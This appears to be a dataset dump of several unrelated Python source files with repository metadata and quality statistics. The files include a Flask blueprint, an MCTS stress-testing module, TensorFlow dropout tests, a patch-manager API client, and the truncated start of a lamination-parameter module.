from .model import PSENet
| 25
| 25
| 0.84
| 4
| 25
| 5.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 25
| 1
| 25
| 25
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12d2ab083352bdf48400fc6be0971f22d482d892
| 193
|
py
|
Python
|
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | null | null | null |
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | 2
|
2021-04-27T13:53:45.000Z
|
2021-06-02T02:34:43.000Z
|
rest_api/__init__.py
|
rajasgs/flask-rest-math-simple
|
3a4206be66f3e53e669daaca924eb32b34b28822
|
[
"MIT"
] | null | null | null |
# Blueprint that aggregates all REST endpoints of this package.
from flask import Blueprint
api = Blueprint('dummy_name', __name__)
# NOTE: the controller modules are imported *after* the Blueprint exists,
# presumably because each registers its routes on `api` at import time —
# do not move these star imports above the Blueprint construction.
from .index import *
from .template_controller import *
from .math_controller import *
from .placeholder_controller import *
| 27.571429
| 39
| 0.803109
| 24
| 193
| 6.125
| 0.5
| 0.204082
| 0.272109
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.124352
| 193
| 7
| 40
| 27.571429
| 0.869822
| 0
| 0
| 0
| 0
| 0
| 0.051546
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.833333
| 0
| 0.833333
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
12dad653ca60c14aa5130fed995b916d974fda0a
| 3,324
|
py
|
Python
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 29
|
2019-01-09T23:56:35.000Z
|
2022-03-18T03:41:10.000Z
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 39
|
2019-01-10T00:32:26.000Z
|
2022-03-12T00:29:05.000Z
|
src/ast_toolbox/mcts/AST_MCTS.py
|
hdelecki/AdaptiveStressTestingToolbox
|
184d7d7f1b4acb65eecb749e3c3a78cbcfc3c4ed
|
[
"MIT"
] | 11
|
2019-01-10T08:11:47.000Z
|
2021-12-28T15:56:02.000Z
|
import ast_toolbox.mcts.MCTSdpw as MCTSdpw
import ast_toolbox.mcts.MDP as MDP
def rollout_getAction(ast):
    """Build a rollout policy closure around *ast*.

    Parameters
    ----------
    ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
        The AST object whose ``random_action`` drives the rollout.

    Returns
    -------
    callable
        A ``policy(s, tree)`` that ignores both arguments and returns a
        random action sampled from *ast*.
    """
    def _policy(state, search_tree):
        # The rollout is state-independent: always sample at random.
        return ast.random_action()

    return _policy
def explore_getAction(ast):
    """Build an exploration policy closure around *ast*.

    Parameters
    ----------
    ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
        The AST object whose ``explore_action`` drives exploration.

    Returns
    -------
    callable
        A ``policy(s, tree)`` that delegates to ``ast.explore_action``.
    """
    def _policy(state, search_tree):
        # Unlike the rollout policy, exploration does use state and tree.
        return ast.explore_action(state, search_tree)

    return _policy
def stress_test(ast, mcts_params, top_paths, verbose=True, return_tree=False):
    """Run a stress test in mode 1 (search with a single tree).

    Parameters
    ----------
    ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
        The AST object.
    mcts_params : :py:class:`ast_toolbox.mcts.MCTSdpw.DPWParams`
        The MCTS parameters.
    top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`
        Bounded priority queue for top-rewarded trajectories.
        NOTE(review): this parameter is not used in the body; results are
        read from ``ast.top_paths`` instead.
    verbose : bool, optional
        Whether to log test information.
    return_tree : bool, optional
        Whether to also return the search tree.

    Returns
    -------
    results
        The bounded priority queue storing top-rewarded trajectories
        (``ast.top_paths``).
    tree : dict
        The resulting search tree (only when ``return_tree`` is true).
    """
    model = MCTSdpw.DPWModel(
        ast.transition_model, rollout_getAction(ast), explore_getAction(ast))
    search_tree = MCTSdpw.DPWTree(mcts_params, model)
    # Run the simulation for its side effects on ast.top_paths; the
    # (reward, action sequence) return value is not needed here.
    MDP.simulate(search_tree.f.model, search_tree, MCTSdpw.selectAction,
                 verbose=verbose)
    results = ast.top_paths
    if return_tree:
        return results, search_tree.s_tree
    return results
def stress_test2(ast, mcts_params, top_paths, verbose=True, return_tree=False):
    """Run a stress test in mode 2 (search with multiple trees).

    Parameters
    ----------
    ast : :py:class:`ast_toolbox.mcts.AdaptiveStressTest.AdaptiveStressTesting`
        The AST object.
    mcts_params : :py:class:`ast_toolbox.mcts.MCTSdpw.DPWParams`
        The MCTS parameters; mutated here (``clear_nodes`` disabled, budget
        ``n`` scaled by the episode length).
    top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`
        Bounded priority queue for top-rewarded trajectories.
        NOTE(review): not used in the body; results come from
        ``ast.top_paths``.
    verbose : bool, optional
        Whether to log test information.
    return_tree : bool, optional
        Whether to also return the search tree.

    Returns
    -------
    results
        The bounded priority queue storing top-rewarded trajectories
        (``ast.top_paths``).
    tree : dict
        The resulting search tree (only when ``return_tree`` is true).
    """
    # Mode 2 keeps nodes between steps and spreads the iteration budget
    # over the whole episode.
    mcts_params.clear_nodes = False
    mcts_params.n *= ast.params.max_steps
    model = MCTSdpw.DPWModel(
        ast.transition_model, rollout_getAction(ast), explore_getAction(ast))
    search_tree = MCTSdpw.DPWTree(mcts_params, model)
    initial_state = search_tree.f.model.getInitialState()
    MCTSdpw.selectAction(search_tree, initial_state, verbose=verbose)
    results = ast.top_paths
    if return_tree:
        return results, search_tree.s_tree
    return results
| 32.588235
| 103
| 0.697353
| 401
| 3,324
| 5.63591
| 0.209476
| 0.053097
| 0.074336
| 0.075221
| 0.797345
| 0.779646
| 0.779646
| 0.779646
| 0.779646
| 0.779646
| 0
| 0.001137
| 0.206378
| 3,324
| 101
| 104
| 32.910891
| 0.855572
| 0.533093
| 0
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.193548
| false
| 0
| 0.064516
| 0.064516
| 0.516129
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
421cb04b319cf61007343439df6c69238a9ccc22
| 72
|
py
|
Python
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 40
|
2019-03-31T03:32:17.000Z
|
2022-02-23T13:43:45.000Z
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 3
|
2019-03-19T10:40:08.000Z
|
2019-03-30T18:27:35.000Z
|
chatbot/tests.py
|
kunci115/cerdas
|
5c956960904ef96677a30405a3b2af53d714689e
|
[
"MIT"
] | 9
|
2019-03-18T02:37:13.000Z
|
2020-12-16T13:59:34.000Z
|
from __future__ import print_function
from django.test import TestCase
| 18
| 37
| 0.861111
| 10
| 72
| 5.7
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 72
| 3
| 38
| 24
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
42409f948832c254702a14993659abe90cd21938
| 4,288
|
py
|
Python
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 20
|
2019-11-13T01:09:53.000Z
|
2022-03-25T16:26:35.000Z
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 131
|
2019-10-12T10:53:17.000Z
|
2021-12-03T19:52:47.000Z
|
tests/test_rnn_dropout.py
|
sagnik/baseline
|
8d75616e04c1cca509dbebbb6d08ad7e1a7b9f88
|
[
"Apache-2.0"
] | 7
|
2020-02-04T15:35:59.000Z
|
2022-03-12T13:22:20.000Z
|
import os
import pytest
# Skip the entire module at collection time: these TF1-style RNN tests are
# known-broken per the message below, so none of the tests run.
pytest.skip("This has been broken for a while, will fix soon, BL", allow_module_level=True)
import numpy as np
# Only runnable when tensorflow is installed; otherwise the module skips.
tf = pytest.importorskip("tensorflow")
from baseline.tf.tfy import rnn_cell_w_dropout, lstm_cell_w_dropout
@pytest.fixture(scope="module")
def set_cpu():
    """Force TensorFlow onto the CPU for the duration of the module.

    Fix: the original unconditionally set and then deleted
    ``CUDA_VISIBLE_DEVICES``, clobbering any value the caller had exported
    and leaving the override in place if teardown was interrupted. The
    previous value is now saved and restored inside try/finally.
    """
    previous = os.environ.get("CUDA_VISIBLE_DEVICES")
    os.environ["CUDA_VISIBLE_DEVICES"] = ""
    try:
        yield
    finally:
        if previous is None:
            del os.environ["CUDA_VISIBLE_DEVICES"]
        else:
            os.environ["CUDA_VISIBLE_DEVICES"] = previous
def test_static_dropout_lstm_cell():
    """LSTM cell with dropout on zeroes almost all outputs; off does not.

    Fix: ``np.int`` was a deprecated alias of the builtin ``int`` and was
    removed in NumPy 1.24, so ``dtype=np.int`` raises AttributeError on
    modern NumPy; the builtin ``int`` is the exact equivalent.
    """
    with tf.device("/cpu:0"):
        sess = tf.compat.v1.Session()
        x = np.random.randn(1, 10, 50).astype(np.float32)
        with sess.graph.as_default():
            with tf.variable_scope("DropoutIsOn"):
                rnn_drop_cell = lstm_cell_w_dropout(100, 0.9999999999, training=True)
                rnn_drop, _ = tf.nn.dynamic_rnn(
                    rnn_drop_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32
                )
            with tf.variable_scope("DropoutIsOff"):
                rnn_no_drop_cell = lstm_cell_w_dropout(100, 0.9999999999, training=False)
                rnn_no_drop, _ = tf.nn.dynamic_rnn(
                    rnn_no_drop_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32
                )
        sess.run(tf.compat.v1.global_variables_initializer())
        # With a ~1.0 dropout argument and training=True the output should
        # be almost entirely zeros; with training=False it should not.
        out_ten = sess.run(rnn_drop)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
        out_ten = sess.run(rnn_no_drop)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_static_dropout_rnn_cell():
    """GRU cell with dropout on zeroes almost all outputs; off does not.

    Fix: ``np.int`` was removed in NumPy 1.24; use the builtin ``int``
    (the exact value the alias used to resolve to).
    """
    with tf.device("/cpu:0"):
        sess = tf.compat.v1.Session()
        x = np.random.randn(1, 10, 50).astype(np.float32)
        with sess.graph.as_default():
            with tf.variable_scope("DropoutIsOn"):
                rnn_drop_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=True)
                rnn_drop, _ = tf.nn.dynamic_rnn(
                    rnn_drop_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32
                )
            with tf.variable_scope("DropoutIsOff"):
                rnn_no_drop_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=False)
                rnn_no_drop, _ = tf.nn.dynamic_rnn(
                    rnn_no_drop_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32
                )
        sess.run(tf.compat.v1.global_variables_initializer())
        out_ten = sess.run(rnn_drop)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
        out_ten = sess.run(rnn_no_drop)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_placeholder_dropout_lstm_cell():
    """LSTM dropout toggled at run time via a boolean placeholder.

    Fix: ``np.int`` was removed in NumPy 1.24; use the builtin ``int``.
    """
    with tf.device("/cpu:0"):
        sess = tf.compat.v1.Session()
        x = np.random.randn(1, 10, 50).astype(np.float32)
        with sess.graph.as_default():
            # Defaults to False so the no-feed run is the dropout-off case.
            train_flag = tf.compat.v1.placeholder_with_default(False, shape=(), name="TEST_TRAIN_FLAG")
            with tf.variable_scope("DropoutMightBeOn"):
                rnn_cell = lstm_cell_w_dropout(100, 0.9999999999, training=train_flag)
                rnn, _ = tf.nn.dynamic_rnn(rnn_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32)
        sess.run(tf.compat.v1.global_variables_initializer())
        out_ten = sess.run(rnn, {train_flag: True})
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
        out_ten = sess.run(rnn)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
def test_placeholder_dropout_rnn_cell():
    """GRU dropout toggled at run time via a boolean placeholder.

    Fix: ``np.int`` was removed in NumPy 1.24; use the builtin ``int``.
    """
    with tf.device("/cpu:0"):
        sess = tf.compat.v1.Session()
        x = np.random.randn(1, 10, 50).astype(np.float32)
        with sess.graph.as_default():
            train_flag = tf.compat.v1.placeholder_with_default(False, shape=(), name="TEST_TRAIN_FLAG")
            with tf.variable_scope("DropoutMightBeOn"):
                rnn_cell = rnn_cell_w_dropout(100, 0.9999999999, "gru", training=train_flag)
                rnn, _ = tf.nn.dynamic_rnn(rnn_cell, x, sequence_length=np.array([10], dtype=int), dtype=tf.float32)
        sess.run(tf.compat.v1.global_variables_initializer())
        out_ten = sess.run(rnn, {train_flag: True})
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) < 20
        out_ten = sess.run(rnn)
        assert len(out_ten[np.nonzero(out_ten)].squeeze()) > 20
| 45.617021
| 119
| 0.634795
| 610
| 4,288
| 4.204918
| 0.159016
| 0.05614
| 0.038986
| 0.040546
| 0.903314
| 0.882261
| 0.882261
| 0.882261
| 0.882261
| 0.870565
| 0
| 0.050456
| 0.232743
| 4,288
| 93
| 120
| 46.107527
| 0.729179
| 0
| 0
| 0.683544
| 0
| 0
| 0.057836
| 0
| 0
| 0
| 0
| 0
| 0.101266
| 1
| 0.063291
| false
| 0
| 0.063291
| 0
| 0.126582
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
42566ff76db628c9a53d6a492a66762803d0990f
| 133
|
py
|
Python
|
naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 4
|
2019-02-14T08:02:41.000Z
|
2020-10-20T10:35:55.000Z
|
naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 71
|
2018-08-26T22:31:39.000Z
|
2022-01-20T10:29:23.000Z
|
naucse/cli.py
|
befeleme/naucse.python.cz
|
dee2c8cce8db90108b01b40c0981053943352d11
|
[
"MIT"
] | 40
|
2018-08-22T14:44:59.000Z
|
2021-09-20T16:11:27.000Z
|
import elsa
from naucse.views import app
def main():
    """CLI entry point: hand the Flask app to elsa's command-line interface."""
    # XXX: Arca stuff
    # NOTE(review): base_url is presumably the canonical deployment URL so
    # generated pages can use absolute links — confirm against elsa's docs.
    elsa.cli(app, base_url='https://naucse.python.cz')
| 14.777778
| 54
| 0.676692
| 21
| 133
| 4.238095
| 0.809524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18797
| 133
| 8
| 55
| 16.625
| 0.824074
| 0.112782
| 0
| 0
| 0
| 0
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
426ce06f78b6f756ae8c48144ef040f44d71bd60
| 148
|
py
|
Python
|
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | 2
|
2016-08-24T18:42:41.000Z
|
2017-12-08T00:41:02.000Z
|
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | null | null | null |
canteen/templates/compiled/snippets/__init__.py
|
dbl0null/canteen
|
3bef22a2059ef6ac5df178324fbc1dba45316e22
|
[
"MIT"
] | 2
|
2015-09-22T05:36:27.000Z
|
2017-12-08T00:41:21.000Z
|
# -*- coding: utf-8 -*-
"""
compiled templates: compiled.snippets
"""
# subtemplates
from canteen.templates.compiled.snippets.test import *
| 12.333333
| 54
| 0.682432
| 15
| 148
| 6.733333
| 0.733333
| 0.336634
| 0.49505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008065
| 0.162162
| 148
| 11
| 55
| 13.454545
| 0.806452
| 0.493243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
42ad346cf207f7113f8aa65651f1c6d4268e84a3
| 7,858
|
py
|
Python
|
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | 5
|
2019-07-31T04:11:05.000Z
|
2021-01-07T03:23:20.000Z
|
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
patch_manager_sdk/api/patch_task/patch_task_client.py
|
easyopsapis/easyops-api-python
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sys
import patch_manager_sdk.api.patch_task.create_task_pb2
import patch_manager_sdk.api.patch_task.get_task_detail_pb2
import patch_manager_sdk.api.patch_task.list_task_pb2
import patch_manager_sdk.model.easy_command.task_detail_pb2
import patch_manager_sdk.api.patch_task.update_task_pb2
import patch_manager_sdk.utils.http_util
import google.protobuf.json_format
class PatchTaskClient(object):
    """Client for the patch_manager ``patch_task`` API.

    The four public endpoints previously duplicated the routing and
    request/response plumbing verbatim; it is now factored into the
    private helpers :meth:`_route_name` and :meth:`_invoke`, so each
    endpoint only supplies its HTTP verb, URI, API contract name and
    response message class. Behavior and wire format are unchanged.
    """

    def __init__(self, server_ip="", server_port=0, service_name="", host=""):
        """Initialize the client.

        :param server_ip: server IP to call directly; when empty, routing
            goes through the naming service
        :param server_port: server port, used together with server_ip
        :param service_name: explicit service name for routing; when both
            server_ip and service_name are set, server_ip takes precedence
        :param host: Host header to send, e.g. cmdb.easyops-only.com
        :raises Exception: when only one of server_ip / server_port is set
        """
        # server_ip and server_port must be supplied together (both set,
        # or both left at their defaults).
        if server_ip == "" and server_port != 0 or server_ip != "" and server_port == 0:
            raise Exception("server_ip和server_port必须同时指定")
        self._server_ip = server_ip
        self._server_port = server_port
        self._service_name = service_name
        self._host = host

    def _route_name(self, contract_name):
        """Return the dst routing name for a call.

        An explicit service name wins; otherwise, when a fixed server
        address is configured, route by the API contract name; else empty.
        """
        if self._service_name != "":
            return self._service_name
        if self._server_ip != "":
            return contract_name
        return ""

    def _invoke(self, method, uri, contract_name, request, headers, timeout):
        """Serialize *request* and perform the HTTP call.

        Returns the decoded response object (a mapping with a "data" key)
        exactly as ``do_api_request`` produces it.
        """
        return patch_manager_sdk.utils.http_util.do_api_request(
            method=method,
            src_name="logic.patch_manager_sdk",
            dst_name=self._route_name(contract_name),
            server_ip=self._server_ip,
            server_port=self._server_port,
            host=self._host,
            uri=uri,
            params=google.protobuf.json_format.MessageToDict(
                request, preserving_proto_field_name=True),
            headers=headers,
            timeout=timeout,
        )

    def create_patch_task(self, request, org, user, timeout=10):
        # type: (patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskRequest, int, str, int) -> patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse
        """Launch a patch-installation task.

        :param request: the create_patch_task request message
        :param org: customer org number (int)
        :param user: username used for the API call
        :param timeout: call timeout in seconds
        :return: patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse
        """
        rsp_obj = self._invoke(
            "POST",
            "/api/patch_manager/v1/patch_task",
            "easyops.api.patch_manager.patch_task.CreatePatchTask",
            request,
            {"org": org, "user": user},
            timeout,
        )
        rsp = patch_manager_sdk.api.patch_task.create_task_pb2.CreatePatchTaskResponse()
        google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
        return rsp

    def get_patch_task_detail(self, request, org, user, timeout=10):
        # type: (patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailRequest, int, str, int) -> patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse
        """Fetch the details of a patch-installation task.

        :param request: the get_patch_task_detail request message
        :param org: customer org number (int)
        :param user: username used for the API call
        :param timeout: call timeout in seconds
        :return: patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse
        """
        rsp_obj = self._invoke(
            "GET",
            "/api/patch_manager/v1/patch_task/{taskId}".format(
                taskId=request.taskId,
            ),
            "easyops.api.patch_manager.patch_task.GetPatchTaskDetail",
            request,
            {"org": org, "user": user},
            timeout,
        )
        rsp = patch_manager_sdk.api.patch_task.get_task_detail_pb2.GetPatchTaskDetailResponse()
        google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
        return rsp

    def list_patch_task(self, request, org, user, timeout=10):
        # type: (patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskRequest, int, str, int) -> patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse
        """List patch-installation tasks.

        :param request: the list_patch_task request message
        :param org: customer org number (int)
        :param user: username used for the API call
        :param timeout: call timeout in seconds
        :return: patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse
        """
        rsp_obj = self._invoke(
            "GET",
            "/api/patch_manager/v1/patch_task",
            "easyops.api.patch_manager.patch_task.ListPatchTask",
            request,
            {"org": org, "user": user},
            timeout,
        )
        rsp = patch_manager_sdk.api.patch_task.list_task_pb2.ListPatchTaskResponse()
        google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
        return rsp

    def host_patch_task_callback(self, request, org, user, timeout=10):
        # type: (patch_manager_sdk.model.easy_command.task_detail_pb2.TaskDetail, int, str, int) -> patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse
        """Callback reporting the result of a host patch task.

        :param request: the host_patch_task_callback request message
        :param org: customer org number (int)
        :param user: username used for the API call
        :param timeout: call timeout in seconds
        :return: patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse
        """
        rsp_obj = self._invoke(
            "POST",
            "/api/patch_manager/v1/host_patch_task",
            "easyops.api.patch_manager.patch_task.HostPatchTaskCallback",
            request,
            {"org": org, "user": user},
            timeout,
        )
        rsp = patch_manager_sdk.api.patch_task.update_task_pb2.HostPatchTaskCallbackResponse()
        google.protobuf.json_format.ParseDict(rsp_obj["data"], rsp, ignore_unknown_fields=True)
        return rsp
| 39.686869
| 194
| 0.648129
| 904
| 7,858
| 5.266593
| 0.137168
| 0.095778
| 0.094518
| 0.071834
| 0.820206
| 0.816005
| 0.798362
| 0.79101
| 0.78975
| 0.751103
| 0
| 0.00638
| 0.262026
| 7,858
| 197
| 195
| 39.888325
| 0.814623
| 0.232502
| 0
| 0.699187
| 0
| 0
| 0.093373
| 0.083231
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04065
| false
| 0
| 0.073171
| 0
| 0.154472
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c4074cd5eb8df55a70f579a712e8c1f26da6518d
| 45,952
|
py
|
Python
|
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | null | null | null |
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | null | null | null |
src/CLA/lampam_functions.py
|
noemiefedon/LAYLA
|
b4aec89131c5bca98d7a0f961090c9152800eccc
|
[
"MIT"
] | 1
|
2021-12-02T21:10:06.000Z
|
2021-12-02T21:10:06.000Z
|
# -*- coding: utf-8 -*-
"""
Functions to calculate lamination parameters
- filter_lampam
returns lamination parameters where a few numerical approximations have
been filtered regarding the constraints for laminate symmetry and balance,
and the fibre orientations used
- calc_lampam, calc_lampam_2
calculates the lamination parameters of one or more laminates from their
stacking sequence
- calc_lampam_sym
returns the lamination parameters of one or more symmetric laminates
with even ply counts
- calc_lampam_10_sym
    returns the 10th lamination parameter of a symmetric laminate
    with an even ply count from the half stacking sequence
- calc_lampam_11_sym
    returns the 11th lamination parameter of a symmetric laminate
    with an even ply count from the half stacking sequence
- test_lampam
returns the lamination parameter components associated to a symmetric
multi-panel structure with the orientations of its outer plies known, the
    rest of the plies assumed as quasi-isotropic
- calc_lampam_mp
returns the lamination parameters of a multipanel structure
- calc_delta_lampam_1
returns ply partial lamination parameters
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam
returns the lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampamA
returns the in-plane lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampamD
returns the out-of-plane lamination parameters of ply groups plies
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_mp
returns lamination parameters associated with the sublaminate
corresponding to a group of plies in a multi-panel structure
- calc_delta_lampam_mp_2
returns the partial lamination parameters associated to the outer plies
used to improve the damage tolerance of a multi-panel structure
- calc_delta_lampam_mp_3
returns the lamination parameters associated to a single ply in a
multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_mp_3A
returns the in-plane lamination parameters associated to a single ply in a
multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_mp_3D
returns the out-of-plane lamination parameters associated to a single ply
in a multi-panel structure
(when the ply does not cover a panel, the lamination parameter are zeros)
- calc_delta_lampam_tab
returns lamination parameter components associated with one group of plies
with uniform thickness
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_tab_t
returns lamination parameter components associated with groups of plies
with varying thickness
(considers the two symmetric parts for a symmetric laminate)
- calc_delta_lampam_tab_t_1
returns lamination parameter components associated with one group of plies
with varying thickness
(considers the two symmetric parts for a symmetric laminate)
"""
__version__ = '1.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
sys.path.append(r'C:\LAYLA')
from src.divers.pretty_print import print_lampam, print_ss
from src.LAYLA_V02.parameters import Parameters
from src.LAYLA_V02.constraints import Constraints
def filter_lampam(lampam, constraints):
    """Zero out lamination-parameter entries that must vanish by design.

    Removes numerical noise from components that are exactly zero under
    the active guidelines: the coupling block (indices 4:8) for symmetric
    laminates, and indices 3, 7 and 11 when every allowed fibre angle lies
    in {0, +-45, +-90, +-135}.

    OUTPUTS
